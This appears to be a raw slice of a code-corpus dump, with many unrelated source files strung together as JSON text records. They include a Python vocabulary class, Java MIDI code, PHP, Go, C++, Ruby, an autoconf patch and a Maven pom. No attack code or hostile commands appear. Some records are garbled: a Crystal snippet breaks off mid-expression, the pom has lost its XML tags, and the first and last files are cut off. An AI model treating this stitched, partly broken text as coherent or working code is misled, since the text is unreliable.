index_term[0]\n '[PAD]'\n >>> index_term[42]\n Traceback (most recent call last):\n ...\n KeyError: 42\n >>> a_index = term_index['A']\n >>> c_index = term_index['C']\n >>> vocab.transform(['C', 'A', 'C']) == [c_index, a_index, c_index]\n True\n >>> vocab.transform(['C', 'A', '[OOV]']) == [c_index, a_index, 1]\n True\n >>> indices = vocab.transform(list('ABCDDZZZ'))\n >>> ' '.join(vocab.state['index_term'][i] for i in indices)\n 'A B C D D [OOV] [OOV] [OOV]'\n\n \"\"\"\n\n def __init__(self, pad_value: str = '', oov_value: str = ''):\n \"\"\"Vocabulary unit initializer.\"\"\"\n super().__init__()\n self._pad = pad_value\n self._oov = oov_value\n self._context['term_index'] = self.TermIndex()\n self._context['index_term'] = dict()\n\n class TermIndex(dict):\n \"\"\"Map term to index.\"\"\"\n\n def __missing__(self, key):\n \"\"\"Map out-of-vocabulary terms to index 1.\"\"\"\n return 1\n\n def fit(self, tokens: list):\n \"\"\"Build a :class:`TermIndex` and a :class:`IndexTerm`.\"\"\"\n self._context['term_index'][self._pad] = 0\n self._context['term_index'][self._oov] = 1\n self._context['index_term'][0] = self._pad\n self._context['index_term'][1] = self._oov\n terms = set(tokens)\n for index, term in enumerate(terms):\n self._context['term_index'][term] = index + 2\n self._context['index_term'][index + 2] = term\n\n def transform(self, input_: list) -> list:\n \"\"\"Transform a list of tokens to corresponding indices.\"\"\"\n return [self._context['term_index'][token] for token in input_]\n\n\nclass BertVocabulary(StatefulUnit):\n \"\"\"\n Vocabulary class.\n\n :param pad_value: The string value for the padding position.\n :param oov_value: The string value for the out-of-vocabulary terms.\n\n Examples:\n >>> vocab = BertVocabulary(pad_value='[PAD]', oov_value='[UNK]')\n >>> indices = vocab.transform(list('ABCDDZZZ'))\n\n \"\"\"\n\n def __init__(self, pad_value: str = '[PAD]', oov_value: str = '[UNK]'):\n \"\"\"Vocabulary unit initializer.\"\"\"\n super().__init__()\n self._pad = pad_value\n self._oov = oov_value\n self._context['term_index'] = self.TermIndex()\n self._context['index_term'] = {}\n\n class TermIndex(dict):\n \"\"\"Map term to index.\"\"\"\n\n def __missing__(self, key):\n \"\"\"Map out-of-vocabulary terms to index 100 .\"\"\"\n return 100\n\n def fit(self, vocab_path: str):\n \"\"\"Build a :class:`TermIndex` and a :class:`IndexTerm`.\"\"\"\n with open(vocab_path, 'r', encoding='utf-8') as vocab_file:\n for idx, line in enumerate(vocab_file):\n term = line.strip()\n self._context['term_index'][term] = idx\n self._context['index_term'][idx] = term\n\n def transform(self, input_: list) -> list:\n \"\"\"Transform a list of tokens to corresponding indices.\"\"\"\n return [self._context['term_index'][token] for token in input_]\n"} {"text": "/*\n * Copyright (c) 2007, 2013, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation. Oracle designates this\n * particular file as subject to the \"Classpath\" exception as provided\n * by Oracle in the LICENSE file that accompanied this code.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n */\n\npackage com.sun.media.sound;\n\nimport javax.sound.midi.InvalidMidiDataException;\nimport javax.sound.midi.ShortMessage;\n\n/**\n * A short message class that support for than 16 midi channels.\n *\n * @author Karl Helgason\n */\npublic final class SoftShortMessage extends ShortMessage {\n\n int channel = 0;\n\n @Override\n public int getChannel() {\n return channel;\n }\n\n @Override\n public void setMessage(int command, int channel, int data1, int data2)\n throws InvalidMidiDataException {\n this.channel = channel;\n super.setMessage(command, channel & 0xF, data1, data2);\n }\n\n @Override\n public Object clone() {\n SoftShortMessage clone = new SoftShortMessage();\n try {\n clone.setMessage(getCommand(), getChannel(), getData1(), getData2());\n } catch (InvalidMidiDataException e) {\n throw new IllegalArgumentException(e);\n }\n return clone;\n }\n}\n"} {"text": "\n *\n * Original code based on the CommonMark JS reference parser (https://bitly.com/commonmark-js)\n * - (c) John MacFarlane\n *\n * For the full copyright and license information, please view the LICENSE\n * file that was distributed with this source code.\n */\n\nnamespace League\\CommonMark\\Block\\Element;\n\nuse League\\CommonMark\\ContextInterface;\nuse League\\CommonMark\\Cursor;\n\n/**\n * @method children() AbstractBlock[]\n */\nclass ListBlock extends AbstractBlock\n{\n const TYPE_BULLET = 'bullet';\n const TYPE_ORDERED = 'ordered';\n\n /**\n * @deprecated This constant is deprecated in league/commonmark 1.4 and will be removed in 2.0; use TYPE_BULLET instead\n */\n const TYPE_UNORDERED = self::TYPE_BULLET;\n\n /**\n * @var bool\n */\n protected $tight = false;\n\n /**\n * @var ListData\n */\n protected $listData;\n\n public function __construct(ListData $listData)\n {\n $this->listData = $listData;\n }\n\n /**\n * @return ListData\n */\n public function getListData(): ListData\n {\n return $this->listData;\n }\n\n public function endsWithBlankLine(): bool\n {\n if ($this->lastLineBlank) {\n return true;\n }\n\n if ($this->hasChildren()) {\n return $this->lastChild() instanceof AbstractBlock && $this->lastChild()->endsWithBlankLine();\n }\n\n return false;\n }\n\n public function canContain(AbstractBlock $block): bool\n {\n return $block instanceof ListItem;\n }\n\n public function isCode(): bool\n {\n return false;\n }\n\n public function matchesNextLine(Cursor $cursor): bool\n {\n return true;\n }\n\n public function finalize(ContextInterface $context, int $endLineNumber)\n {\n parent::finalize($context, $endLineNumber);\n\n $this->tight = true; // tight by default\n\n foreach ($this->children() as $item) {\n if (!($item instanceof AbstractBlock)) {\n continue;\n }\n\n // check for non-final list item ending with blank line:\n if ($item->endsWithBlankLine() && $item !== $this->lastChild()) {\n $this->tight = false;\n break;\n }\n\n // Recurse into children of list item, to see if there are\n // spaces between any of them:\n foreach ($item->children() as $subItem) {\n if ($subItem instanceof AbstractBlock && $subItem->endsWithBlankLine() && ($item !== $this->lastChild() || $subItem !== $item->lastChild())) {\n $this->tight = false;\n break;\n }\n }\n }\n }\n\n public function isTight(): bool\n {\n return $this->tight;\n }\n\n public function setTight(bool $tight): self\n {\n $this->tight = $tight;\n\n return $this;\n }\n}\n"} {"text": "apiVersion: v1\nkind: ConfigMap\nmetadata:\n name: special-config\n namespace: default\ndata:\n special.how: very\n---\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: env-config\n namespace: default\ndata:\n log_level: INFO\n"} {"text": "#!/usr/bin/env crystal\nM=10**9+7\na=ARGF.gets_to_end.split.map &.to_i\nn,k=a.shift(2)\nr=[1]+[0]*k\na.each{|e|\n\tx=[0]\n\tq=0\n\t(1..k+1).each{|i|q=(q+r[i-1])%M;x<;\n});"} {"text": "$:.unshift File.dirname(__FILE__)\n\nrequire 'faker/address'\nrequire 'faker/company'\nrequire 'faker/internet'\nrequire 'faker/lorem'\nrequire 'faker/name'\nrequire 'faker/phone_number'\nrequire 'faker/version'\n\nrequire 'extensions/array'\nrequire 'extensions/object'\n\nmodule Faker\n def self.numerify(number_string)\n number_string.gsub(/#/) { rand(10).to_s }\n end\n \n def self.letterify(letter_string)\n letter_string.gsub(/\\?/) { ('a'..'z').to_a.rand }\n end\n \n def self.bothify(string)\n self.letterify(self.numerify(string))\n end\nend"} {"text": "package client // import \"github.com/docker/docker/client\"\n\nimport (\n\t\"context\"\n\t\"encoding/json\"\n\t\"fmt\"\n\n\t\"github.com/docker/docker/api/types\"\n)\n\n// DiskUsage requests the current data usage from the daemon\nfunc (cli *Client) DiskUsage(ctx context.Context) (types.DiskUsage, error) {\n\tvar du types.DiskUsage\n\n\tserverResp, err := cli.get(ctx, \"/system/df\", nil, nil)\n\tdefer ensureReaderClosed(serverResp)\n\tif err != nil {\n\t\treturn du, err\n\t}\n\n\tif err := json.NewDecoder(serverResp.body).Decode(&du); err != nil {\n\t\treturn du, fmt.Errorf(\"Error retrieving disk usage: %v\", err)\n\t}\n\n\treturn du, nil\n}\n"} {"text": "// Copyright 2017 Google Inc. All rights reserved.\n//\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file or at\n// https://developers.google.com/open-source/licenses/bsd\n\n#include \"packager/mpd/base/period.h\"\n\n#include \"packager/base/stl_util.h\"\n#include \"packager/mpd/base/adaptation_set.h\"\n#include \"packager/mpd/base/mpd_options.h\"\n#include \"packager/mpd/base/mpd_utils.h\"\n#include \"packager/mpd/base/xml/xml_node.h\"\n\nnamespace shaka {\nnamespace {\n\n// The easiest way to check whether two protobufs are equal, is to compare the\n// serialized version.\nbool ProtectedContentEq(\n const MediaInfo::ProtectedContent& content_protection1,\n const MediaInfo::ProtectedContent& content_protection2) {\n return content_protection1.SerializeAsString() ==\n content_protection2.SerializeAsString();\n}\n\nstd::set GetUUIDs(\n const MediaInfo::ProtectedContent& protected_content) {\n std::set uuids;\n for (const auto& entry : protected_content.content_protection_entry())\n uuids.insert(entry.uuid());\n return uuids;\n}\n\nconst std::string& GetDefaultAudioLanguage(const MpdOptions& mpd_options) {\n return mpd_options.mpd_params.default_language;\n}\n\nconst std::string& GetDefaultTextLanguage(const MpdOptions& mpd_options) {\n return mpd_options.mpd_params.default_text_language.empty()\n ? mpd_options.mpd_params.default_language\n : mpd_options.mpd_params.default_text_language;\n}\n\nAdaptationSet::Role RoleFromString(const std::string& role_str) {\n if (role_str == \"caption\")\n return AdaptationSet::Role::kRoleCaption;\n if (role_str == \"subtitle\")\n return AdaptationSet::Role::kRoleSubtitle;\n if (role_str == \"main\")\n return AdaptationSet::Role::kRoleMain;\n if (role_str == \"alternate\")\n return AdaptationSet::Role::kRoleAlternate;\n if (role_str == \"supplementary\")\n return AdaptationSet::Role::kRoleSupplementary;\n if (role_str == \"commentary\")\n return AdaptationSet::Role::kRoleCommentary;\n if (role_str == \"dub\")\n return AdaptationSet::Role::kRoleDub;\n return AdaptationSet::Role::kRoleUnknown;\n}\n\n} // namespace\n\nPeriod::Period(uint32_t period_id,\n double start_time_in_seconds,\n const MpdOptions& mpd_options,\n uint32_t* representation_counter)\n : id_(period_id),\n start_time_in_seconds_(start_time_in_seconds),\n mpd_options_(mpd_options),\n representation_counter_(representation_counter) {}\n\nAdaptationSet* Period::GetOrCreateAdaptationSet(\n const MediaInfo& media_info,\n bool content_protection_in_adaptation_set) {\n // Set duration if it is not set. It may be updated later from duration\n // calculated from segments.\n if (duration_seconds_ == 0)\n duration_seconds_ = media_info.media_duration_seconds();\n\n const std::string key = GetAdaptationSetKey(\n media_info, mpd_options_.mpd_params.allow_codec_switching);\n\n std::list& adaptation_sets = adaptation_set_list_map_[key];\n\n for (AdaptationSet* adaptation_set : adaptation_sets) {\n if (protected_adaptation_set_map_.Match(\n *adaptation_set, media_info, content_protection_in_adaptation_set))\n return adaptation_set;\n }\n\n // None of the adaptation sets match with the new content protection.\n // Need a new one.\n const std::string language = GetLanguage(media_info);\n std::unique_ptr new_adaptation_set =\n NewAdaptationSet(language, mpd_options_, representation_counter_);\n if (!SetNewAdaptationSetAttributes(language, media_info, adaptation_sets,\n content_protection_in_adaptation_set,\n new_adaptation_set.get())) {\n return nullptr;\n }\n\n if (content_protection_in_adaptation_set &&\n media_info.has_protected_content()) {\n protected_adaptation_set_map_.Register(*new_adaptation_set, media_info);\n AddContentProtectionElements(media_info, new_adaptation_set.get());\n }\n for (AdaptationSet* adaptation_set : adaptation_sets) {\n if (protected_adaptation_set_map_.Switchable(*adaptation_set,\n *new_adaptation_set)) {\n adaptation_set->AddAdaptationSetSwitching(new_adaptation_set.get());\n new_adaptation_set->AddAdaptationSetSwitching(adaptation_set);\n }\n }\n\n AdaptationSet* adaptation_set_ptr = new_adaptation_set.get();\n adaptation_sets.push_back(adaptation_set_ptr);\n adaptation_sets_.emplace_back(std::move(new_adaptation_set));\n return adaptation_set_ptr;\n}\n\nxml::scoped_xml_ptr Period::GetXml(bool output_period_duration) {\n adaptation_sets_.sort(\n [](const std::unique_ptr& adaptation_set_a,\n const std::unique_ptr& adaptation_set_b) {\n if (!adaptation_set_a->has_id())\n return false;\n if (!adaptation_set_b->has_id())\n return true;\n return adaptation_set_a->id() < adaptation_set_b->id();\n });\n\n xml::XmlNode period(\"Period\");\n\n // Required for 'dynamic' MPDs.\n period.SetId(id_);\n // Iterate thru AdaptationSets and add them to one big Period element.\n for (const auto& adaptation_set : adaptation_sets_) {\n xml::scoped_xml_ptr child(adaptation_set->GetXml());\n if (!child || !period.AddChild(std::move(child)))\n return nullptr;\n }\n\n if (output_period_duration) {\n period.SetStringAttribute(\"duration\",\n SecondsToXmlDuration(duration_seconds_));\n } else if (mpd_options_.mpd_type == MpdType::kDynamic) {\n period.SetStringAttribute(\"start\",\n SecondsToXmlDuration(start_time_in_seconds_));\n }\n return period.PassScopedPtr();\n}\n\nconst std::list Period::GetAdaptationSets() const {\n std::list adaptation_sets;\n for (const auto& adaptation_set : adaptation_sets_) {\n adaptation_sets.push_back(adaptation_set.get());\n }\n return adaptation_sets;\n}\n\nstd::unique_ptr Period::NewAdaptationSet(\n const std::string& language,\n const MpdOptions& options,\n uint32_t* representation_counter) {\n return std::unique_ptr(\n new AdaptationSet(language, options, representation_counter));\n}\n\nbool Period::SetNewAdaptationSetAttributes(\n const std::string& language,\n const MediaInfo& media_info,\n const std::list& adaptation_sets,\n bool content_protection_in_adaptation_set,\n AdaptationSet* new_adaptation_set) {\n if (!media_info.dash_roles().empty()) {\n for (const std::string& role_str : media_info.dash_roles()) {\n AdaptationSet::Role role = RoleFromString(role_str);\n if (role == AdaptationSet::kRoleUnknown) {\n LOG(ERROR) << \"Unrecognized role '\" << role_str << \"'.\";\n return false;\n }\n new_adaptation_set->AddRole(role);\n }\n } else if (!language.empty()) {\n const bool is_main_role =\n language == (media_info.has_audio_info()\n ? GetDefaultAudioLanguage(mpd_options_)\n : GetDefaultTextLanguage(mpd_options_));\n if (is_main_role)\n new_adaptation_set->AddRole(AdaptationSet::kRoleMain);\n }\n for (const std::string& accessibility : media_info.dash_accessibilities()) {\n size_t pos = accessibility.find('=');\n if (pos == std::string::npos) {\n LOG(ERROR)\n << \"Accessibility should be in scheme=value format, but seeing \"\n << accessibility;\n return false;\n }\n new_adaptation_set->AddAccessibility(accessibility.substr(0, pos),\n accessibility.substr(pos + 1));\n }\n\n new_adaptation_set->set_codec(GetBaseCodec(media_info));\n\n if (media_info.has_video_info()) {\n // Because 'language' is ignored for videos, |adaptation_sets| must have\n // all the video AdaptationSets.\n if (adaptation_sets.size() > 1) {\n new_adaptation_set->AddRole(AdaptationSet::kRoleMain);\n } else if (adaptation_sets.size() == 1) {\n (*adaptation_sets.begin())->AddRole(AdaptationSet::kRoleMain);\n new_adaptation_set->AddRole(AdaptationSet::kRoleMain);\n }\n\n if (media_info.video_info().has_playback_rate()) {\n std::string trick_play_reference_adaptation_set_key;\n AdaptationSet* trick_play_reference_adaptation_set =\n FindMatchingAdaptationSetForTrickPlay(\n media_info, content_protection_in_adaptation_set,\n &trick_play_reference_adaptation_set_key);\n if (trick_play_reference_adaptation_set) {\n new_adaptation_set->AddTrickPlayReference(\n trick_play_reference_adaptation_set);\n } else {\n trickplay_cache_[trick_play_reference_adaptation_set_key].push_back(\n new_adaptation_set);\n }\n } else {\n std::string trick_play_adaptation_set_key;\n AdaptationSet* trickplay_adaptation_set =\n FindMatchingAdaptationSetForTrickPlay(\n media_info, content_protection_in_adaptation_set,\n &trick_play_adaptation_set_key);\n if (trickplay_adaptation_set) {\n trickplay_adaptation_set->AddTrickPlayReference(new_adaptation_set);\n trickplay_cache_.erase(trick_play_adaptation_set_key);\n }\n }\n\n } else if (media_info.has_text_info()) {\n // IOP requires all AdaptationSets to have (sub)segmentAlignment set to\n // true, so carelessly set it to true.\n // In practice it doesn't really make sense to adapt between text tracks.\n new_adaptation_set->ForceSetSegmentAlignment(true);\n }\n return true;\n}\n\nAdaptationSet* Period::FindMatchingAdaptationSetForTrickPlay(\n const MediaInfo& media_info,\n bool content_protection_in_adaptation_set,\n std::string* adaptation_set_key) {\n std::list* adaptation_sets = nullptr;\n const bool is_trickplay_adaptation_set =\n media_info.video_info().has_playback_rate();\n if (is_trickplay_adaptation_set) {\n *adaptation_set_key = GetAdaptationSetKeyForTrickPlay(media_info);\n if (adaptation_set_list_map_.find(*adaptation_set_key) ==\n adaptation_set_list_map_.end())\n return nullptr;\n adaptation_sets = &adaptation_set_list_map_[*adaptation_set_key];\n } else {\n *adaptation_set_key = GetAdaptationSetKey(\n media_info, mpd_options_.mpd_params.allow_codec_switching);\n if (trickplay_cache_.find(*adaptation_set_key) == trickplay_cache_.end())\n return nullptr;\n adaptation_sets = &trickplay_cache_[*adaptation_set_key];\n }\n for (AdaptationSet* adaptation_set : *adaptation_sets) {\n if (protected_adaptation_set_map_.Match(\n *adaptation_set, media_info,\n content_protection_in_adaptation_set)) {\n return adaptation_set;\n }\n }\n\n return nullptr;\n}\n\nstd::string Period::GetAdaptationSetKeyForTrickPlay(\n const MediaInfo& media_info) {\n MediaInfo media_info_no_trickplay = media_info;\n media_info_no_trickplay.mutable_video_info()->clear_playback_rate();\n return GetAdaptationSetKey(media_info_no_trickplay,\n mpd_options_.mpd_params.allow_codec_switching);\n}\n\nvoid Period::ProtectedAdaptationSetMap::Register(\n const AdaptationSet& adaptation_set,\n const MediaInfo& media_info) {\n DCHECK(!ContainsKey(protected_content_map_, &adaptation_set));\n protected_content_map_[&adaptation_set] = media_info.protected_content();\n}\n\nbool Period::ProtectedAdaptationSetMap::Match(\n const AdaptationSet& adaptation_set,\n const MediaInfo& media_info,\n bool content_protection_in_adaptation_set) {\n if (adaptation_set.codec() != GetBaseCodec(media_info))\n return false;\n\n if (!content_protection_in_adaptation_set)\n return true;\n\n const auto protected_content_it =\n protected_content_map_.find(&adaptation_set);\n // If the AdaptationSet ID is not registered in the map, then it is clear\n // content.\n if (protected_content_it == protected_content_map_.end())\n return !media_info.has_protected_content();\n if (!media_info.has_protected_content())\n return false;\n\n return ProtectedContentEq(protected_content_it->second,\n media_info.protected_content());\n}\n\nbool Period::ProtectedAdaptationSetMap::Switchable(\n const AdaptationSet& adaptation_set_a,\n const AdaptationSet& adaptation_set_b) {\n const auto protected_content_it_a =\n protected_content_map_.find(&adaptation_set_a);\n const auto protected_content_it_b =\n protected_content_map_.find(&adaptation_set_b);\n\n if (protected_content_it_a == protected_content_map_.end())\n return protected_content_it_b == protected_content_map_.end();\n if (protected_content_it_b == protected_content_map_.end())\n return false;\n // Get all the UUIDs of the AdaptationSet. If another AdaptationSet has the\n // same UUIDs then those are switchable.\n return GetUUIDs(protected_content_it_a->second) ==\n GetUUIDs(protected_content_it_b->second);\n}\n\nPeriod::~Period() {\n if (!trickplay_cache_.empty()) {\n LOG(WARNING) << \"Trickplay adaptation set did not get a valid adaptation \"\n \"set match. Please check the command line options.\";\n }\n}\n\n} // namespace shaka\n"} {"text": "Manifest-Version: 1.0\nBuilt-By: Administrator\nClass-Path: leo-im-api-1.0.jar leo-im-common-1.0.jar leo-im-service-1.\n 0.jar leo-im-store-1.0.jar mysql-connector-java-8.0.11.jar protobuf-j\n ava-2.6.0.jar druid-1.1.9.jar leo-im-model-1.0.jar leo-im-util-1.0.ja\n r cglib-3.2.6.jar asm-6.0.jar ant-1.9.6.jar ant-launcher-1.9.6.jar jj\n wt-0.9.0.jar jackson-databind-2.8.9.jar jackson-annotations-2.8.0.jar\n jackson-core-2.8.9.jar leo-im-notification-1.0.jar jedis-2.9.0.jar c\n ommons-pool2-2.4.2.jar fastjson-1.2.47.jar slf4j-api-1.7.25.jar logba\n ck-classic-1.2.3.jar logback-core-1.2.3.jar\nBuild-Jdk: 1.8.0_131\nCreated-By: Maven Integration for Eclipse\nMain-Class: org.leo.im.starter.App\n\n"} {"text": "var baseForOwnRight = require('../internal/baseForOwnRight'),\n createFindKey = require('../internal/createFindKey');\n\n/**\n * This method is like `_.findKey` except that it iterates over elements of\n * a collection in the opposite order.\n *\n * If a property name is provided for `predicate` the created `_.property`\n * style callback returns the property value of the given element.\n *\n * If a value is also provided for `thisArg` the created `_.matchesProperty`\n * style callback returns `true` for elements that have a matching property\n * value, else `false`.\n *\n * If an object is provided for `predicate` the created `_.matches` style\n * callback returns `true` for elements that have the properties of the given\n * object, else `false`.\n *\n * @static\n * @memberOf _\n * @category Object\n * @param {Object} object The object to search.\n * @param {Function|Object|string} [predicate=_.identity] The function invoked\n * per iteration.\n * @param {*} [thisArg] The `this` binding of `predicate`.\n * @returns {string|undefined} Returns the key of the matched element, else `undefined`.\n * @example\n *\n * var users = {\n * 'barney': { 'age': 36, 'active': true },\n * 'fred': { 'age': 40, 'active': false },\n * 'pebbles': { 'age': 1, 'active': true }\n * };\n *\n * _.findLastKey(users, function(chr) {\n * return chr.age < 40;\n * });\n * // => returns `pebbles` assuming `_.findKey` returns `barney`\n *\n * // using the `_.matches` callback shorthand\n * _.findLastKey(users, { 'age': 36, 'active': true });\n * // => 'barney'\n *\n * // using the `_.matchesProperty` callback shorthand\n * _.findLastKey(users, 'active', false);\n * // => 'fred'\n *\n * // using the `_.property` callback shorthand\n * _.findLastKey(users, 'active');\n * // => 'pebbles'\n */\nvar findLastKey = createFindKey(baseForOwnRight);\n\nmodule.exports = findLastKey;\n"} {"text": "# == Schema Information\n#\n# Table name: email_searches\n#\n# id :integer not null, primary key\n# domain :string(255)\n# crawls :integer\n# harvested_email_id :integer\n# created_at :datetime\n# updated_at :datetime\n#\n\nrequire 'test_helper'\n\nclass EmailSearchTest < ActiveSupport::TestCase\n # test \"the truth\" do\n # assert true\n # end\nend\n"} {"text": "From b0a64db90a24469e36978c748417ebe456b34d59 Mon Sep 17 00:00:00 2001\nFrom: Khem Raj \nDate: Sat, 22 Apr 2017 11:54:57 -0700\nSubject: [PATCH] configure: Check for -Wno-error=format-truncation compiler\n option\n\nIf this option is supported by compiler then disable it ( gcc7+)\nUse -Werror to elevate the warning to an error in case compiler like clang\nwhich warn about unknown options but not error out unless asked for\n\nFixes\nclient.c:834:23: error: '%s' directive output may be truncated writing up to 1023 bytes into a region of size 1010 [-Werror=format-truncation=]\n\nSigned-off-by: Khem Raj \n\n---\n configure.ac | 1 +\n m4/ax_check_compile_flag.m4 | 74 +++++++++++++++++++++++++++++++++++++\n 2 files changed, 75 insertions(+)\n create mode 100644 m4/ax_check_compile_flag.m4\n\ndiff --git a/configure.ac b/configure.ac\nindex a7eca97d..560eb988 100644\n--- a/configure.ac\n+++ b/configure.ac\n@@ -7101,6 +7101,7 @@ if test \"x$GCC\" = \"xyes\"; then\n AM_CXXFLAGS=\"$AM_CXXFLAGS -Werror\"\n fi\n fi\n+AX_CHECK_COMPILE_FLAG([-Werror -Werror=format-truncation],[AM_CFLAGS=\"$AM_CFLAGS -Wno-error=format-truncation\" AM_CXXFLAGS=\"$AM_CXXFLAGS -Wno-error=format-truncation\"])\n \n AC_SUBST([AM_CFLAGS])\n AC_SUBST([AM_CXXFLAGS])\ndiff --git a/m4/ax_check_compile_flag.m4 b/m4/ax_check_compile_flag.m4\nnew file mode 100644\nindex 00000000..dcabb92a\n--- /dev/null\n+++ b/m4/ax_check_compile_flag.m4\n@@ -0,0 +1,74 @@\n+# ===========================================================================\n+# https://www.gnu.org/software/autoconf-archive/ax_check_compile_flag.html\n+# ===========================================================================\n+#\n+# SYNOPSIS\n+#\n+# AX_CHECK_COMPILE_FLAG(FLAG, [ACTION-SUCCESS], [ACTION-FAILURE], [EXTRA-FLAGS], [INPUT])\n+#\n+# DESCRIPTION\n+#\n+# Check whether the given FLAG works with the current language's compiler\n+# or gives an error. (Warnings, however, are ignored)\n+#\n+# ACTION-SUCCESS/ACTION-FAILURE are shell commands to execute on\n+# success/failure.\n+#\n+# If EXTRA-FLAGS is defined, it is added to the current language's default\n+# flags (e.g. CFLAGS) when the check is done. The check is thus made with\n+# the flags: \"CFLAGS EXTRA-FLAGS FLAG\". This can for example be used to\n+# force the compiler to issue an error when a bad flag is given.\n+#\n+# INPUT gives an alternative input source to AC_COMPILE_IFELSE.\n+#\n+# NOTE: Implementation based on AX_CFLAGS_GCC_OPTION. Please keep this\n+# macro in sync with AX_CHECK_{PREPROC,LINK}_FLAG.\n+#\n+# LICENSE\n+#\n+# Copyright (c) 2008 Guido U. Draheim \n+# Copyright (c) 2011 Maarten Bosmans \n+#\n+# This program is free software: you can redistribute it and/or modify it\n+# under the terms of the GNU General Public License as published by the\n+# Free Software Foundation, either version 3 of the License, or (at your\n+# option) any later version.\n+#\n+# This program is distributed in the hope that it will be useful, but\n+# WITHOUT ANY WARRANTY; without even the implied warranty of\n+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\n+# Public License for more details.\n+#\n+# You should have received a copy of the GNU General Public License along\n+# with this program. If not, see .\n+#\n+# As a special exception, the respective Autoconf Macro's copyright owner\n+# gives unlimited permission to copy, distribute and modify the configure\n+# scripts that are the output of Autoconf when processing the Macro. You\n+# need not follow the terms of the GNU General Public License when using\n+# or distributing such scripts, even though portions of the text of the\n+# Macro appear in them. The GNU General Public License (GPL) does govern\n+# all other use of the material that constitutes the Autoconf Macro.\n+#\n+# This special exception to the GPL applies to versions of the Autoconf\n+# Macro released by the Autoconf Archive. When you make and distribute a\n+# modified version of the Autoconf Macro, you may extend this special\n+# exception to the GPL to apply to your modified version as well.\n+\n+#serial 5\n+\n+AC_DEFUN([AX_CHECK_COMPILE_FLAG],\n+[AC_PREREQ(2.64)dnl for _AC_LANG_PREFIX and AS_VAR_IF\n+AS_VAR_PUSHDEF([CACHEVAR],[ax_cv_check_[]_AC_LANG_ABBREV[]flags_$4_$1])dnl\n+AC_CACHE_CHECK([whether _AC_LANG compiler accepts $1], CACHEVAR, [\n+ ax_check_save_flags=$[]_AC_LANG_PREFIX[]FLAGS\n+ _AC_LANG_PREFIX[]FLAGS=\"$[]_AC_LANG_PREFIX[]FLAGS $4 $1\"\n+ AC_COMPILE_IFELSE([m4_default([$5],[AC_LANG_PROGRAM()])],\n+ [AS_VAR_SET(CACHEVAR,[yes])],\n+ [AS_VAR_SET(CACHEVAR,[no])])\n+ _AC_LANG_PREFIX[]FLAGS=$ax_check_save_flags])\n+AS_VAR_IF(CACHEVAR,yes,\n+ [m4_default([$2], :)],\n+ [m4_default([$3], :)])\n+AS_VAR_POPDEF([CACHEVAR])dnl\n+])dnl AX_CHECK_COMPILE_FLAGS\n"} {"text": "//\n// CustomSegue.h\n// CustomSegue\n//\n// Created by phimage on 24/07/16.\n// Copyright © 2016 phimage. All rights reserved.\n//\n\n#import \n\n//! Project version number for CustomSegue.\nFOUNDATION_EXPORT double CustomSegueVersionNumber;\n\n//! Project version string for CustomSegue.\nFOUNDATION_EXPORT const unsigned char CustomSegueVersionString[];\n\n// In this header, you should import all the public headers of your framework using statements like #import \n\n\n"} {"text": "\n\t4.0.0\n\t\n\t\torg.imixs.workflow\n\t\timixs-workflow\n\t\t5.2.6-SNAPSHOT\n\t\n\timixs-workflow-index-lucene\n\tSearch Index Apache Lucene\n\n\t\n\t\n\t\t\n\t\t\n\t\t\torg.imixs.workflow\n\t\t\timixs-workflow-core\n\t\t\t${project.version}\n\t\t\n\t\t\n\t\t\torg.imixs.workflow\n\t\t\timixs-workflow-engine\n\t\t\t${project.version}\n\t\t\n\t\n\t\t\n\t\t\n\t\t\torg.apache.lucene\n\t\t\tlucene-core\n\t\t\t${lucene.version}\n\t\t\n\t\t\n\t\t\torg.apache.lucene\n\t\t\tlucene-analyzers-common\n\t\t\t${lucene.version}\n\t\t\n\t\t\n\t\t\torg.apache.lucene\n\t\t\tlucene-queryparser\n\t\t\t${lucene.version}\n\t\t\n\t\n\tSerach Index based on Apache Lucene Core\n"} {"text": "\n\n \n \n \n"} {"text": "/*\n * Copyright (c) 1998, 2001, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation. Oracle designates this\n * particular file as subject to the \"Classpath\" exception as provided\n * by Oracle in the LICENSE file that accompanied this code.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n */\n\n/*\n * finite(x) returns 1 is x is finite, else 0;\n * no branching!\n */\n\n#include \"fdlibm.h\"\n\n#ifdef __STDC__\n int finite(double x)\n#else\n int finite(x)\n double x;\n#endif\n{\n int hx;\n hx = __HI(x);\n return (unsigned)((hx&0x7fffffff)-0x7ff00000)>>31;\n}\n"} {"text": "package com.mifos.mifosxdroid.dialogfragments.identifierdialog;\n\n\nimport com.mifos.api.datamanager.DataManagerClient;\nimport com.mifos.mifosxdroid.R;\nimport com.mifos.mifosxdroid.base.BasePresenter;\nimport com.mifos.objects.noncore.DocumentType;\nimport 